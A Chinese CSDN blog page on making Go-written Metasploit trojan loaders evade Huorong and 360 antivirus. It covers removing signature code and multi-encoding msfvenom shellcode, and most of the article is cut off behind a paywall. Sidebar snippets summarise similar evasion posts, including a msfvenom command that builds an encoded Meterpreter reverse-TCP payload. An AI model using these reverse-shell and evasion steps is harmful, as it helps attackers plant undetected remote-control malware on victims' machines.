技术分享 | go语言源码免杀MSF木马

最新推荐文章于 2024-09-02 20:37:59 发布
最新推荐文章于 2024-09-02 20:37:59 发布
阅读量1.5k 收藏 5
点赞数 1
分类专栏: 网络安全 文章标签: 网络安全 信息安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Uguardsec/article/details/119106785
版权
本文探讨了如何使用Go语言来实现MSF木马的加载器和shellcode免杀。通过修改加载器源码避免特征码被查杀,以及利用msfvenom进行编码绕过安全检测。实验结果显示,经过优化后的加载器和shellcode可以绕过火绒的查杀,但360的静态查杀仍有反应。最后,通过结合优化的加载器和shellcode,成功创建了一个能过360动静态免杀的完整加载者木马。
摘要由CSDN通过智能技术生成

木马源码免杀两种形式:下载者和加载者
https://www.freebuf.com/articles/system/227468.html

前言

加载者的免杀分为两部分:

  1. 加载器本身的免杀,加载器源码因为在网上发布许久。特征码已被查杀。
  2. msf本身的shllcode免杀。需要对msf马进行多次混淆编码。

加载器免杀

这里我不放shellcode,看看网上加载器的特征会被多少AV识别。
在微步的VT 0/25
在这里插入图片描述
virustotal的VT 15/71
在这里插入图片描述
在这里插入图片描述
免杀的过了火绒,但是没过360。

接下来从源码级别看看能不能免杀加载器。

因为这个加载器放在freebuf很久了 360的肯定加入黑名单了。

对下载者做下改动,方便shellcode的填写。
在这里插入图片描述
把这个shellcode_buf删掉,火绒无报毒。说明这里是特征码之一。

<
最低0.47元/天 解锁文章
天磊卫士官方
关注
专栏目录
GO语言实现的简单“木马”小程序
Vince的修炼之路
11-06 7225
初学GO语言可能会感觉到很枯燥,而且GO和其他的编程语言的语法还有很大的差异,可能刚开始很难入门,为了提高对GO语言的学习兴趣,快速地掌握GO的基本语法,我尝试写了个类似后门的小程序,主要的功能是可以在另一台设备上查看和操作目标设备,我是在我自己的电脑上运行这个小程序,然后用PAD来操作我的电脑,实现简单的目录访问和文件查看,还有重启或关闭计算机的简单功能,由于我也是才开始学习GO语言第二天,也就
免杀源代码
10-03
过360提示 主程序免杀源代码
木马免杀处理
最新发布
weixin_58666006的博客
09-02 996
木马免杀,脚本型木马和二进制型木马
MSF免杀
LainWith的博客
12-12 2987
MSF 参考: 远控免杀专题文章(2)-msfvenom隐藏的参数 远控免杀专题文章(3)-msf免杀(VT免杀率35/69) msfvenom简介 msfvenom是msfpayload和msfencode的结合体,于2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit-framework下面的的msfpayload(荷载生成),msfencoder(编码),msfcli(监听接口)都不再被支持。 参数 ![image.png](https://img
msf免杀
weixin_30662849的博客
04-13 294
卧槽 最近闲的没事干 搞一下渗透学习下 拿到 一个域成员权限,但是有360 。。。。(&……% 好烦啊 都不能免杀 突然看到一个帖子 很牛逼 依然到现在还是免杀的 首先msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.1.100 -e x86/shikata_ga_nai -i 11 ...
msf编码免杀
m0_61506558的博客
09-03 2596
自编码处理自捆绑+编码多重编码接口下载式签名伪装式
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1461
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
黑客(网络安全)自学
dexi113的博客
07-10 748
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
aming小老弟
12-21 1286
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
源码免杀webshell
05-04
源码免杀webshell免杀性能好。稳定性强这个是非常好的一份开源代码。
2022网络安全技术自学路线图及职业选择方向
热门推荐
欢迎来到技术宅的博客
03-18 1万+
每天都有新闻报道描述着新技术对人们的生活和工作方式带来的巨大乃至压倒性影响。与此同时有关网络攻击和数据泄露的头条新闻也是日益频繁。 攻击者可谓无处不在:企业外部充斥着黑客、有组织的犯罪团体以及民族国家网络间谍,他们的能力和蛮横程度正日渐增长;企业内部是员工和承包商,无论有意与否,他们都可能是造成恶意或意外事件的罪魁祸首。 那作为一个零基础的小白,此时适合进入网络安全行业吗,它的就业前景怎么样,应该怎么选择适合自己的岗位? 本文将针对这几个问题,逐一进行解答,希望能够对大家有帮助。 (友情提示,全文五
木马源代码免杀处理
p123456789p的专栏
03-17 1533
木马源代码免杀处理  ------------------------------------------有加这样免杀的:------------------------------------------begin  asm  //直接用汇编调用代码进行免杀处理源代码  call testend;Procedure test;asmnopnopnope
简单的Msf木马免杀
weixin_47948655的博客
08-12 1212
简单加密shellcode与加载实现msf木马免杀
免杀方法(三)msf加载免杀
qq_56426046的博客
10-03 1055
编辑i686-w64-mingw32-gcc main.c -o mm.exe-lws2_32。Metasploit还有编码模块(Encoders),生成后门前,对其进行编码转换,可以混。metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,Framework(MSF)在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试。在红队中是个香饽饽,使用这个模块生成的后门,不仅支持多种平台,而且。
木马免杀实践-golang
网络安全。
08-09 2134
0x01 简介 这里以github上一个golang免杀项目为例,项目地址:https://github.com/yumusb/CS-Loader/tree/master/go%E7%89%88%E6%9C%AC,原项目使用方法如下,根据其要求生成cobaltstrike木马后,上传virustotal,免杀效果已经比较差了,且生成木马大小为5.9M,比较大。 0x02 解读原项目 原项目–python加密部分 此项目加密shellcode采用的方式是base64 -> RC4加密 -> bas
远控免杀专题3---msf免杀
qq_41683305的博客
03-09 1466
0x01 免杀能力一览表 上面表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。 为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2019.12.12),火...
msf生成免杀木马
qq_56426046的博客
09-08 5701
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值